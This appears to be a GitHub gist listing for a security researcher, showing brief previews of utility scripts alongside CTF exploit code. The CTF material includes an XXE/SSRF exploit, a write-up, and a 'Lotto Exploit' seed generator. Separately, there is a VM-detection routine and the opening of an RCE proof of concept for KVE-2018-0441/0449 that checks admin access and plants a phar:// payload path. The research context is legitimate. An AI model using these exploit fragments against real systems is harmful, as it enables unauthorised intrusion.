Harold Kim stypr

stypr / ping.php
Created February 6, 2015 19:15
cloudflare auto ddns + memory flush
#!/usr/bin/php
<?php
/*
* crontab -e
* 0 5 * * * ~/ping.php
*/
error_reporting(0);
set_time_limit(0);
stypr / wlan_mac.py
Created February 7, 2015 06:05
Change WLAN MAC address randomly in OSX
#!/usr/bin/python
import os
import sys
check_root = os.popen("whoami").read().strip()
if check_root == "root":
    mac_real = os.popen("ifconfig en0 | grep ether") \
        .read().strip().replace("ether ", "")
    mac_hex = os.popen("openssl rand -hex 6").read().strip()
stypr / gist:1bbed682337cdd64e101
Created February 11, 2015 03:27
IP ban and check for fake IPs
<?php
/* This won't work on Tor services */
function checkSecurity(){
    $list = "ban.txt";
    $deny = array();
    $fo = fopen($list, "r");
    $str = fread($fo, filesize($list));
    fclose($fo);
    $str = str_replace(",","_",$str);
    $ary = explode("_",$str);
stypr / pipupdate.py
Created July 1, 2015 09:24
pip update all packages
import pip
from subprocess import call
for dist in pip.get_installed_distributions():
    call("pip install --upgrade " + dist.project_name, shell=True)
stypr / exploit.py
Created November 3, 2017 09:58
familiar (485pt) XXE + SSRF
#!/usr/bin/python -u
#-*- encoding: utf-8 -*-
import os
import sys
import requests
import json
from base64 import *
HOST = "core.eagle-jump.org"
stypr / VirtualMachineDetect.bas
Created February 7, 2015 06:11
Detect software-based Virtual Machine in VB6
Public Function VirtualMachineProtect() As Boolean
    'VMs are easily detectable by registry and library checkup
    On Error Resume Next
    Dim hKey As Long, hOpen As Long, hQuery As Long, hSnapShot As Long
    Dim me32 As MODULEENTRY32
    Dim szBuffer As String * 128
    hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId)
    me32.dwSize = Len(me32)
    Module32First hSnapShot, me32
    Do While Module32Next(hSnapShot, me32) <> 0
stypr / iptables-irccloud.sh
Created October 29, 2017 14:42
iptables configuration for connections between irssiproxy and irccloud
iptables -N irccloud
iptables -A irccloud --src 192.184.9.108 -j ACCEPT
iptables -A irccloud --src 192.184.9.110 -j ACCEPT
iptables -A irccloud --src 192.184.9.112 -j ACCEPT
iptables -A irccloud --src 192.184.10.118 -j ACCEPT
iptables -A irccloud --src 192.184.10.9 -j ACCEPT
iptables -A irccloud --src 170.178.187.131 -j ACCEPT
iptables -A irccloud --src 192.184.8.73 -j ACCEPT
iptables -A irccloud --src 192.184.8.103 -j ACCEPT
iptables -A irccloud -j DROP
stypr / README.md
Last active June 22, 2019 15:47
ASIS CTF 2016 Finals: pentest (298pt)

pentest (298pt)

Solves: 1

This write-up was made per request of other players who were playing ASIS CTF.

Note: I solved this challenge before the hint was released. \o/

Description

stypr / attack_script.js
Last active August 3, 2019 16:47
KVE-2018-0441, KVE-2018-0449 RCE PoC (Windows Only)
// Payload of the uploaded file.
// var payload = `phar://../data\\file/free/1062687231_CmB8gHok_143f7b739dcab1b6837abdfa39b0109467c35d51.gif/GIF89a.php`;
var payload = `[PAYLOAD_URL]`
// Before the attack, first check whether the current user is an administrator who has access to this feature.
$.get(`../qa_config.php`, function(d){
    // The field to modify is the one containing the "file path", so check only that part first.
    if(d.indexOf(`상단 파일 경로`) !== false){
stypr / 9en3rat0r.php
Last active August 3, 2019 16:54
Lotto Exploit
<?php
function generator()
{
    $PATH = "./s3cre7_fi1e";
    $init_seed = 0;
    if(!file_exists(realpath($PATH)))
    {
        $init_seed = $seed = intval(uniqid(),10);
        $f = fopen($PATH,"w");
        fwrite($f,$init_seed);